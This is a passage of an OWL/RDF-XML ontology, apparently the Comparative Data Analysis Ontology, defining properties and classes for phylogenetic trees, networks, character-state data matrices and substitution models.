<rdfs:domain rdf:resource="&obo;CDAO_0000098"/>
<rdfs:range rdf:resource="&obo;CDAO_0000138"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000190"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000192 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000192">
<rdfs:label rdf:datatype="&xsd;string">belongs_to_Network</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000006"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000190"/>
<rdfs:domain>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000099"/>
<rdf:Description rdf:about="&obo;CDAO_0000140"/>
</owl:unionOf>
</owl:Class>
</rdfs:domain>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000193 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000193">
<rdfs:label rdf:datatype="&xsd;string">has_Annotation</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000040"/>
<owl:inverseOf rdf:resource="&obo;CDAO_0000157"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
<rdfs:domain rdf:resource="&owl;Thing"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000194 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000194">
<rdfs:label rdf:datatype="&xsd;string">part_of</rdfs:label>
<owl:inverseOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000195 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000195">
<rdfs:label rdf:datatype="&xsd;string">has_Nucleotide_Datum</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates a nucleotide character (a column in a nucleotide alignment) to a state datum for the character (an individual cell in the alignment column).</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000002"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000206"/>
<rdfs:domain>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000094"/>
<rdf:Description rdf:about="&obo;CDAO_0000138"/>
</owl:unionOf>
</owl:Class>
</rdfs:domain>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000196 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000196">
<rdfs:label rdf:datatype="&xsd;string">represented_by_Node</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates a TU to a node that represents it in a network.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000138"/>
<rdfs:range rdf:resource="&obo;CDAO_0000140"/>
<owl:inverseOf rdf:resource="&obo;CDAO_0000187"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000197 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000197">
<rdfs:label rdf:datatype="&xsd;string">has_Remaining_Coordinate_List</rdfs:label>
<dc:description rdf:datatype="&xsd;string">The property that relates a coordinate list to the item in the list beyond the first item.</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000092"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000092"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000198 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000198">
<rdfs:label rdf:datatype="&xsd;string">has_Element</rdfs:label>
<rdfs:domain rdf:resource="&obo;CDAO_0000118"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000199 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000199">
<rdfs:label rdf:datatype="&xsd;string">exclude_Subtree</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000070"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000161"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000200 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000200">
<rdfs:label rdf:datatype="&xsd;string">belongs_to_Tree</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000110"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000190"/>
<rdfs:domain>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000099"/>
<rdf:Description rdf:about="&obo;CDAO_0000140"/>
</owl:unionOf>
</owl:Class>
</rdfs:domain>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000201 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000201">
<rdf:type rdf:resource="&owl;FunctionalProperty"/>
<rdfs:label rdf:datatype="&xsd;string">has_Parent_Node</rdfs:label>
<dc:description>Associates to a Directed Edge the Node that is in the parent position in the edge (i.e., the node touched by the edge and closer to the root of the tree).</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000139"/>
<rdfs:range rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000162"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000202 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000202">
<rdfs:label rdf:datatype="&xsd;string">has_Lineage_node</rdfs:label>
<rdfs:domain rdf:resource="&obo;CDAO_0000004"/>
<rdfs:range rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000203 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000203">
<rdfs:label rdf:datatype="&xsd;string">belongs_to_Tree_as_Root</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000110"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000140"/>
<owl:inverseOf rdf:resource="&obo;CDAO_0000148"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000190"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000204 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000204">
<rdfs:label rdf:datatype="&xsd;string">has_Hereditary_Change</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000097"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000099"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000205 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000205">
<rdf:type rdf:resource="&owl;FunctionalProperty"/>
<rdfs:label rdf:datatype="&xsd;string">belongs_to_Character</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000071"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000098"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000190"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000206 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000206">
<rdfs:label rdf:datatype="&xsd;string">has_Molecular_Datum</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000050"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000183"/>
<rdfs:domain>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000115"/>
<rdf:Description rdf:about="&obo;CDAO_0000138"/>
</owl:unionOf>
</owl:Class>
</rdfs:domain>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000207 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000207">
<rdfs:label rdf:datatype="&xsd;string">has_Continuous_Datum</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates a continuous character to a state datum for the character.</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000019"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000153"/>
<rdfs:domain>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000068"/>
<rdf:Description rdf:about="&obo;CDAO_0000138"/>
</owl:unionOf>
</owl:Class>
</rdfs:domain>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000208 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000208">
<rdfs:label rdf:datatype="&xsd;string">has_TU</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property associates a character data matrix with a TU (a row) represented in the matrix.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000056"/>
<rdfs:range rdf:resource="&obo;CDAO_0000138"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000209 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000209">
<rdf:type rdf:resource="&owl;FunctionalProperty"/>
<rdfs:label rdf:datatype="&xsd;string">has_Child_Node</rdfs:label>
<dc:description>The property associates to a Directed Edge the Node that is in the child position in the edge, i.e., the node touched by the edge and closer to the leaves of the tree.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000139"/>
<rdfs:range rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000162"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000210 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000210">
<rdfs:label rdf:datatype="&xsd;string">has_Right_Node</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates a transformation to a 'right' node (the node that has the 'right' state).</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000097"/>
<rdfs:range rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000182"/>
</owl:ObjectProperty>
<!--
///////////////////////////////////////////////////////////////////////////////////////
//
// Data properties
//
///////////////////////////////////////////////////////////////////////////////////////
-->
<!-- http://purl.obolibrary.org/obo/CDAO_0000211 -->
<owl:DatatypeProperty rdf:about="&obo;CDAO_0000211">
<rdfs:label rdf:datatype="&xsd;string">has_Precision</rdfs:label>
<rdfs:range rdf:resource="&xsd;float"/>
</owl:DatatypeProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000212 -->
<owl:DatatypeProperty rdf:about="&obo;CDAO_0000212">
<rdfs:label rdf:datatype="&xsd;string">has_Point_Coordinate_Value</rdfs:label>
<rdfs:domain rdf:resource="&obo;CDAO_0000003"/>
<rdfs:range rdf:resource="&xsd;integer"/>
</owl:DatatypeProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000213 -->
<owl:DatatypeProperty rdf:about="&obo;CDAO_0000213">
<rdfs:label rdf:datatype="&xsd;string">has_Int_Value</rdfs:label>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000215"/>
<rdfs:range rdf:resource="&xsd;int"/>
</owl:DatatypeProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000214 -->
<owl:DatatypeProperty rdf:about="&obo;CDAO_0000214">
<rdfs:label rdf:datatype="&xsd;string">has_Support_Value</rdfs:label>
<rdfs:range rdf:resource="&xsd;float"/>
</owl:DatatypeProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000215 -->
<owl:DatatypeProperty rdf:about="&obo;CDAO_0000215">
<rdfs:label rdf:datatype="&xsd;string">has_Value</rdfs:label>
</owl:DatatypeProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000216 -->
<owl:DatatypeProperty rdf:about="&obo;CDAO_0000216">
<rdfs:label rdf:datatype="&xsd;string">has_Uncertainty_Factor</rdfs:label>
<rdfs:range rdf:resource="&xsd;float"/>
</owl:DatatypeProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000217 -->
<owl:DatatypeProperty rdf:about="&obo;CDAO_0000217">
<rdfs:label rdf:datatype="&xsd;string">has_Range_End_Value</rdfs:label>
<rdfs:domain rdf:resource="&obo;CDAO_0000095"/>
<rdfs:range rdf:resource="&xsd;integer"/>
</owl:DatatypeProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000218 -->
<owl:DatatypeProperty rdf:about="&obo;CDAO_0000218">
<rdfs:label rdf:datatype="&xsd;string">has_Float_Value</rdfs:label>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000215"/>
<rdfs:range rdf:resource="&xsd;float"/>
</owl:DatatypeProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000219 -->
<owl:DatatypeProperty rdf:about="&obo;CDAO_0000219">
<rdfs:label rdf:datatype="&xsd;string">has_Range_Start_Value</rdfs:label>
<rdfs:domain rdf:resource="&obo;CDAO_0000095"/>
<rdfs:range rdf:resource="&xsd;integer"/>
</owl:DatatypeProperty>
<!--
///////////////////////////////////////////////////////////////////////////////////////
//
// Classes
//
///////////////////////////////////////////////////////////////////////////////////////
-->
<!-- http://purl.obolibrary.org/obo/CDAO_0000002 -->
<owl:Class rdf:about="&obo;CDAO_0000002">
<rdfs:label rdf:datatype="&xsd;string">DesoxiRibonucleotideResidueStateDatum</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000050"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000003 -->
<owl:Class rdf:about="&obo;CDAO_0000003">
<rdfs:label rdf:datatype="&xsd;string">CoordinatePoint</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000022"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000004 -->
<owl:Class rdf:about="&obo;CDAO_0000004">
<rdfs:label rdf:datatype="&xsd;string">Lineage</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000012"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000202"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000140"/>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000005 -->
<owl:Class rdf:about="&obo;CDAO_0000005">
<rdfs:label rdf:datatype="&xsd;string">Phylo4Tree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000074"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000006 -->
<owl:Class rdf:about="&obo;CDAO_0000006">
<rdfs:label rdf:datatype="&xsd;string">Network</rdfs:label>
<rdfs:subClassOf rdf:resource="&owl;Thing"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000178"/>
<owl:allValuesFrom>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000099"/>
<rdf:Description rdf:about="&obo;CDAO_0000140"/>
</owl:unionOf>
</owl:Class>
</owl:allValuesFrom>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000007 -->
<owl:Class rdf:about="&obo;CDAO_0000007">
<rdfs:label rdf:datatype="&xsd;string">ModelDescription</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000040"/>
<dc:description>Description of a model of transformations.</dc:description>
<rdfs:comment>This is a non-computible description of a model, not the fully specified mathematical model, which typically relates the probability of a transformation to various parameters.</rdfs:comment>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000008 -->
<owl:Class rdf:about="&obo;CDAO_0000008">
<rdfs:label rdf:datatype="&xsd;string">StandardStateDatum</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000089"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000009 -->
<owl:Class rdf:about="&obo;CDAO_0000009">
<rdfs:label rdf:datatype="&xsd;string">ContinuousCharacterLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000063"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000010 -->
<owl:Class rdf:about="&obo;CDAO_0000010">
<rdfs:label rdf:datatype="&xsd;string">ContinuousCharBayesianLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000009"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000011 -->
<owl:Class rdf:about="&obo;CDAO_0000011">
<rdfs:label rdf:datatype="&xsd;string">NEXUSTreeBlock</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000074"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000012 -->
<owl:Class rdf:about="&obo;CDAO_0000012">
<rdfs:label rdf:datatype="&xsd;string">RootedTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000110"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000155"/>
<owl:allValuesFrom rdf:resource="&obo;CDAO_0000012"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000148"/>
<owl:onClass rdf:resource="&obo;CDAO_0000140"/>
<owl:qualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:qualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000178"/>
<owl:allValuesFrom>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000139"/>
<rdf:Description rdf:about="&obo;CDAO_0000140"/>
</owl:unionOf>
</owl:Class>
</owl:allValuesFrom>
</owl:Restriction>
</rdfs:subClassOf>
<owl:disjointWith rdf:resource="&obo;CDAO_0000088"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000013 -->
<owl:Class rdf:about="&obo;CDAO_0000013">
<rdfs:label rdf:datatype="&xsd;string">Kimura2Parameters</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000020"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000014 -->
<owl:Class rdf:about="&obo;CDAO_0000014">
<rdfs:label rdf:datatype="&xsd;string">TreeProcedure</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000044"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000015 -->
<owl:Class rdf:about="&obo;CDAO_0000015">
<rdfs:label rdf:datatype="&xsd;string">Generic_State</rdfs:label>
<owl:equivalentClass>
<owl:Class>
<owl:oneOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000222"/>
<rdf:Description rdf:about="&obo;CDAO_0000221"/>
<rdf:Description rdf:about="&obo;CDAO_0000223"/>
</owl:oneOf>
</owl:Class>
</owl:equivalentClass>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000039"/>
<rdfs:comment>This class should be renamed. These are not generic states but non-concrete states including gap, unknown and missing.</rdfs:comment>
<dc:description>This concept is tied to the verbally ambiguous 'gap' concept and to the use of a gap character (often the en dash '-') in text representations of sequence alignments. In general, this represents the absence of any positively diagnosed Character-State. As such, the gap may be interpreted as an additional Character-State, as the absence of the Character, or as an unknown value. In some cases it is helpful to separate these.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000016 -->
<owl:Class rdf:about="&obo;CDAO_0000016">
<rdfs:label rdf:datatype="&xsd;string">UnrootedSubtree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000070"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000017 -->
<owl:Class rdf:about="&obo;CDAO_0000017">
<rdfs:label rdf:datatype="&xsd;string">UnresolvedTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000110"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000018 -->
<owl:Class rdf:about="&obo;CDAO_0000018">
<rdfs:label rdf:datatype="&xsd;string">BifurcatingTree</rdfs:label>
<owl:equivalentClass rdf:resource="&obo;CDAO_0000130"/>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000110"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000019 -->
<owl:Class rdf:about="&obo;CDAO_0000019">
<rdfs:label rdf:datatype="&xsd;string">ContinuousStateDatum</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000098"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000020 -->
<owl:Class rdf:about="&obo;CDAO_0000020">
<rdfs:label rdf:datatype="&xsd;string">SubstitutionModel</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000007"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000021 -->
<owl:Class rdf:about="&obo;CDAO_0000021">
<rdfs:label rdf:datatype="&xsd;string">JukesKantor</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000020"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000022 -->
<owl:Class rdf:about="&obo;CDAO_0000022">
<rdfs:label rdf:datatype="&xsd;string">DatumCoordinate</rdfs:label>
<rdfs:subClassOf rdf:resource="&owl;Thing"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000165"/>
<owl:onClass rdf:resource="&obo;CDAO_0000104"/>
<owl:qualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:qualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
<dc:description>A positional coordinate giving the source of a character state, used for molecular sequences.</dc:description>
<rdfs:comment>drawing from seqloc categories from NCBI at http://www.ncbi.nlm.nih.gov/IEB/ToolBox/SDKDOCS/SEQLOC.HTML#_Seq-loc:_Locations_on</rdfs:comment>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000023 -->
<owl:Class rdf:about="&obo;CDAO_0000023">
<rdfs:label rdf:datatype="&xsd;string">UnresolvedRootedTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000012"/>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000017"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000024 -->
<owl:Class rdf:about="&obo;CDAO_0000024">
<rdfs:label rdf:datatype="&xsd;string">Branch</rdfs:label>
<owl:equivalentClass rdf:resource="&obo;CDAO_0000099"/>
<dc:description>'Branch' is the domain-specific synonym for an edge of a (Phylogenetic) Tree or Network. Branches may have properties such as length and degree of support.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000025 -->
<owl:Class rdf:about="&obo;CDAO_0000025">
<rdfs:label rdf:datatype="&xsd;string">CharacterStateDataMatrixAnnotation</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000040"/>
<dc:description>Meta-information associated with a character matrix, such as, for the case of a sequence alignment, the method of alignment.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000026 -->
<owl:Class rdf:about="&obo;CDAO_0000026">
<rdfs:label rdf:datatype="&xsd;string">AncestralNode</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000174"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000140"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000194"/>
<owl:onClass rdf:resource="&obo;CDAO_0000012"/>
<owl:minQualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:minQualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000027 -->
<owl:Class rdf:about="&obo;CDAO_0000027">
<rdfs:label rdf:datatype="&xsd;string">UnresolvedUnrootedTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000017"/>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000088"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000029 -->
<owl:Class rdf:about="&obo;CDAO_0000029">
<rdfs:label rdf:datatype="&xsd;string">UncertainStateDomain</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000091"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000216"/>
<owl:someValuesFrom rdf:resource="&xsd;float"/>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000030 -->
<owl:Class rdf:about="&obo;CDAO_0000030">
<rdfs:label rdf:datatype="&xsd;string">ReconcileTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000110"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000172"/>
<owl:onClass rdf:resource="&obo;CDAO_0000110"/>
<owl:minQualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">2</owl:minQualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000031 -->
<owl:Class rdf:about="&obo;CDAO_0000031">
<rdfs:label rdf:datatype="&xsd;string">Continuous</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000091"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000215"/>
<owl:cardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:cardinality>
</owl:Restriction>
</rdfs:subClassOf>
<dc:description>This class describes a continuous value. The link to the actual float value is through the property has_Value. It could have also other properties attached (e.g., has_Precision).</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000032 -->
<owl:Class rdf:about="&obo;CDAO_0000032">
<rdfs:label rdf:datatype="&xsd;string">AlignmentProcedure</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000025"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000033 -->
<owl:Class rdf:about="&obo;CDAO_0000033">
<rdfs:label rdf:datatype="&xsd;string">Dichotomy</rdfs:label>
<owl:equivalentClass rdf:resource="&obo;CDAO_0000124"/>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000026"/>
<owl:disjointWith rdf:resource="&obo;CDAO_0000042"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000034 -->
<owl:Class rdf:about="&obo;CDAO_0000034">
<rdfs:label rdf:datatype="&xsd;string">Molecular</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000039"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000035 -->
<owl:Class rdf:about="&obo;CDAO_0000035">
<rdfs:label rdf:datatype="&xsd;string">ContinuousCharParsimonyLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000009"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000039 -->
<owl:Class rdf:about="&obo;CDAO_0000039">
<rdfs:label rdf:datatype="&xsd;string">Categorical</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000091"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000040 -->
<owl:Class rdf:about="&obo;CDAO_0000040">
<rdfs:label rdf:datatype="&xsd;string">CDAOAnnotation</rdfs:label>
<rdfs:subClassOf rdf:resource="&owl;Thing"/>
<rdfs:comment>It is possible that this base class should be discarded and that annotations should inherit from an imported base class if one exists.</rdfs:comment>
<dc:description>The base class of annotations in CDAO.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000041 -->
<owl:Class rdf:about="&obo;CDAO_0000041">
<rdfs:label rdf:datatype="&xsd;string">originationEvent</rdfs:label>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000190"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000097"/>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000042 -->
<owl:Class rdf:about="&obo;CDAO_0000042">
<rdfs:label rdf:datatype="&xsd;string">Polytomy</rdfs:label>
<owl:equivalentClass>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000177"/>
<owl:minCardinality rdf:datatype="&xsd;nonNegativeInteger">3</owl:minCardinality>
</owl:Restriction>
</owl:equivalentClass>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000026"/>
<owl:disjointWith rdf:resource="&obo;CDAO_0000124"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000043 -->
<owl:Class rdf:about="&obo;CDAO_0000043">
<rdfs:label rdf:datatype="&xsd;string">PolymorphicStateDomain</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000091"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000216"/>
<owl:hasValue rdf:datatype="&xsd;float">1.0</owl:hasValue>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000044 -->
<owl:Class rdf:about="&obo;CDAO_0000044">
<rdfs:label rdf:datatype="&xsd;string">TreeAnnotation</rdfs:label>
